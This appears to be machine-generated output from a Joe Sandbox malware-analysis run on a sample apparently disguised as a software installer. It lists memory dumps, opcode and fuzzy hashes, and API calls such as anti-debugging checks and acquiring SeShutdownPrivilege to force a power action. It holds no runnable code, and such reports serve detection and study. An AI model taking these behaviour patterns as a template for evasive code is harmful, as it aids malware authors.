                          • Instruction Fuzzy Hash: 94014472C0116DAFCF019FA88D019EE7FB5AF08214F244265F958E2591E7318AA9DBD1
                          APIs
                          • CreateFileW.KERNEL32(00000000,00000000,?,6CA32F35,?,?,00000000,?,6CA32F35,00000000,0000000C), ref: 6CA33294
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: a83bfcb49aad63366743916ba85e053ad08510091e42bb618ab18dc72d95f219
                          • Instruction ID: ad368674df02199317933126d00a30b39a85887d18b6b6b08eec2cee959e145c
                          • Opcode Fuzzy Hash: a83bfcb49aad63366743916ba85e053ad08510091e42bb618ab18dc72d95f219
                          • Instruction Fuzzy Hash: 82D06C3210020EBBDF029E84DC06EDA3BAAFB48714F018100BA5896020C732E862EB90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                          • Instruction ID: e8b777c3ed181bf43417fab8e2cbe5cdc6a9807d095a35c8a671274109f35311
                          • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                          • Instruction Fuzzy Hash:
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 6CA14B8A
                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CA14B96
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CA14BA4
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CA14BCB
                          • NtInitiatePowerAction.NTDLL ref: 6CA14BDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                          • String ID: SeShutdownPrivilege
                          • API String ID: 3256374457-3733053543
                          • Opcode ID: bd1bcd8e6dd6c0cdcc3a4b198c4be53fbf3a4a27fca808764331e6cafec3234b
                          • Instruction ID: a64294a35082750b0b9f56d46d329c09115d160661ecd60da18c8eab1e060331
                          • Opcode Fuzzy Hash: bd1bcd8e6dd6c0cdcc3a4b198c4be53fbf3a4a27fca808764331e6cafec3234b
                          • Instruction Fuzzy Hash: F9F03AB1644300AFEA10AF24DD0FB5A7BB8EB46701F004918F985AB1D1E7B069948BA3
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: \j`7$\j`7$j
                          • API String ID: 0-3644614255
                          • Opcode ID: ee88b33770937f12b243847e177fe714984f8dcce0fa1936057e349f20285d1c
                          • Instruction ID: eb707a0b4fecad0f56f6ec8b66ea45dda72eb80e8aababf3fe375902608c2d58
                          • Opcode Fuzzy Hash: ee88b33770937f12b243847e177fe714984f8dcce0fa1936057e349f20285d1c
                          • Instruction Fuzzy Hash: 8142327460D3828FCB25CF68C58066ABBE1ABCA354F544E2EE499CB761D334E845CB53
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID:
                          • API String ID: 4218353326-0
                          • Opcode ID: cec7bbe62d69ab6d588e991837682d9c4156be5c933b1d2306c1cd643573d5f8
                          • Instruction ID: 6d8dbb37a09f58885ff67c1ad533795109f662c8ae901ce6ef8f865aa9ecfee6
                          • Opcode Fuzzy Hash: cec7bbe62d69ab6d588e991837682d9c4156be5c933b1d2306c1cd643573d5f8
                          • Instruction Fuzzy Hash: FE53B071649B018FC728CF28C8D0AA5B7E2EF9531871D8A2DC1D68BE55E774B58ACB40
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CA1F099
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CA1F0A3
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CA1F0B0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: e00939f61f8b5b292e3bb661b45c74f08cd5b69c63ff9edc4540b499fc78792b
                          • Instruction ID: 867e48003253d9fdf90aacd88e63da47def76e0b7691b6c0a927efea1a524de5
                          • Opcode Fuzzy Hash: e00939f61f8b5b292e3bb661b45c74f08cd5b69c63ff9edc4540b499fc78792b
                          • Instruction Fuzzy Hash: D231C4749052189BCB21DF65D9887CDBBB8BF08354F5042DAE41CA7650EB749BC58F44
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,?,6CA1E055,6CA18A69,00000003,00000000,6CA18A69,00000000), ref: 6CA1DFBF
                          • TerminateProcess.KERNEL32(00000000,?,6CA1E055,6CA18A69,00000003,00000000,6CA18A69,00000000), ref: 6CA1DFC6
                          • ExitProcess.KERNEL32 ref: 6CA1DFD8
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 8fe439ec96dfa39ee4d709379168604a75f2081ac48d3e5698b370bb498cc010
                          • Instruction ID: b31a0d10b8c4181cc05f882945840d342d2f107ff0a50b46ebd22306dc92b265
                          • Opcode Fuzzy Hash: 8fe439ec96dfa39ee4d709379168604a75f2081ac48d3e5698b370bb498cc010
                          • Instruction Fuzzy Hash: D8E0B631508209ABCF066F54C90CA893F79FF4539AB148514F805CAA21CB3ADAD6CA50
                          APIs
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CA166D0
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CA16EF3
                            • Part of subcall function 6CA18199: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CA16EDC,00000000,?,?,?,6CA16EDC,?,6CA4354C), ref: 6CA181F9
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                          • String ID:
                          • API String ID: 915016180-0
                          • Opcode ID: f3d4fea3b4251da722ac47480e13a83cffdc058ad6019f572e8a2aa5c376efa3
                          • Instruction ID: d7021987f08d15c84c9953e2f2dcbb88bd4bd6ac4f50547b72a7f03fc5ad33a6
                          • Opcode Fuzzy Hash: f3d4fea3b4251da722ac47480e13a83cffdc058ad6019f572e8a2aa5c376efa3
                          • Instruction Fuzzy Hash: A1B19E75E182059FDB04CF55C48269DBBB5FB05724F28822AE426E7F80D734D584CFA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ctype
                          • String ID:
                          • API String ID: 3039457973-3916222277
                          • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                          • Instruction ID: 679261418e53d6aa1b87a41b2d0581d4ece50f5881b072abddc19ddb939c85c8
                          • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                          • Instruction Fuzzy Hash: B403AA34805298DEDF21CBA4CA54BDCBBB1BF15308F24809AD449A7B91DB346ACDDF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: @4J$DsL
                          • API String ID: 0-2004129199
                          • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                          • Instruction ID: 530507af2144aebdce9978ff9e677486819e98b6db8fdaaad5b2da7e6b52d306
                          • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                          • Instruction Fuzzy Hash: 2D2171376A49564BD74CCA28DC33EB92680E748305F89527DE94BCB7E1DF5D8840D648
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: YA1
                          • API String ID: 0-613462611
                          • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                          • Instruction ID: 96e1f922b484d3e288bbdbeb76f750c142f34af50cf4eae343553f02a507cc67
                          • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                          • Instruction Fuzzy Hash: 1042D3706083818FD315DF28D4D069ABBE6FFC9308F184A6DE4D5AB752D631D98ACB42
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aullrem
                          • String ID:
                          • API String ID: 3758378126-0
                          • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                          • Instruction ID: b57f5caf3db2091ccc57b694c3a2ac16c36331d9631e7f7a21d6a526129b839f
                          • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                          • Instruction Fuzzy Hash: 3551E971A052459BD710CF5EC4C02EEFBF6EF79214F28C05EE88897242D27A599AC760
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                          • Instruction ID: ca948720270b889539c5a81bd8708608b5af34a612ec2c59bf2b5b6a9b5457e8
                          • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                          • Instruction Fuzzy Hash: 14029D316083408BD725CF29C99079EBBE2BFC8318F184A2EE4D597B51C7749989CB83
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: x=J
                          • API String ID: 0-1497497802
                          • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                          • Instruction ID: fef6052da47d0ac89575eb2c386701c9cff571d4f08106718554a906d48ba423
                          • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                          • Instruction Fuzzy Hash: 6291EE31D11299DACF04DFA8D9809EDB7B1AF4530CF24C06AE462E7A61DB315ACDCB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: (SL
                          • API String ID: 0-669240678
                          • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                          • Instruction ID: c19f4d119415df2f9b8a4e72ea4e06b29a9f8236ba264fc7d31760e8ef3fa3ae
                          • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                          • Instruction Fuzzy Hash: F6518473E208214AD78CCE24DC2177572D2E788310F8BC1B99D8BAB6E6DD78989587D4
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                          • Instruction ID: 89ccad349f80a41e6b82275ec74e4404d34b8de71cff4d3d11623dfa685403da
                          • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                          • Instruction Fuzzy Hash: B1627C71D02259CFDF15CFA5C990BEDBBB1BF04318F14405AE895ABA80D7749A8ACF90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 36e59002686ab19309f918f3860b747ef88cc1110e88759f7e08e20c8a557b15
                          • Instruction ID: d5d0e88c2888ef8e8df2b8fec3505fb5783154c90d1d5d3654ce6d814a017b56
                          • Opcode Fuzzy Hash: 36e59002686ab19309f918f3860b747ef88cc1110e88759f7e08e20c8a557b15
                          • Instruction Fuzzy Hash: 8D1291713097418FC718CF29C59466AFBE2BFC8344F589A2DE99687B41D731E889CB42
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                          • Instruction ID: 9401c665c1861d00840feba0874de187e5e1ac4721aeed1af4fb664036161070
                          • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                          • Instruction Fuzzy Hash: 52021B31A083128BD319CE2DC484259BBF2FBC4345F1A4B3EE89697A54D774ADC5CB92
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                          • Instruction ID: 70370911e53c3db9d231b740e4e4cf49f57979581d6d4b787a4dfc118e464357
                          • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                          • Instruction Fuzzy Hash: E5F12531A042898BEB24CE2CD8507EEBBE5FBC1304F58453DD889D7B45DB35958ACB91
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                          • Instruction ID: f751c1f52fa3effb3398ee7d8a1fa2efd35bd51ca0d9a2081ac2a0d6c475d771
                          • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                          • Instruction Fuzzy Hash: E3D15471A447128FD318CF1DC4A4236BBE1FF86304F094ABDDAA68B78AD734A555CB42
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                          • Instruction ID: 965cfd2ce9079d1416a2a7d58af6dc97f7cfdf0a3236bd7803e740b6b11015c7
                          • Opcode Fuzzy Hash: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                          • Instruction Fuzzy Hash: 0FB1C3317047094BD324EE79C990BDAB7E9AF84308F04462DD5AAA7B41DF35B98DCB90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                          • Instruction ID: c4ac30afe20efbfed0273c47d980b2e73720fc5117ec9a68aaa59017ccc615aa
                          • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                          • Instruction Fuzzy Hash: 9BA1D17160C3418FC319CE2DC49069ABBE1AFD5318F584A2DE4D6C7B41DA31E98ACB43
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
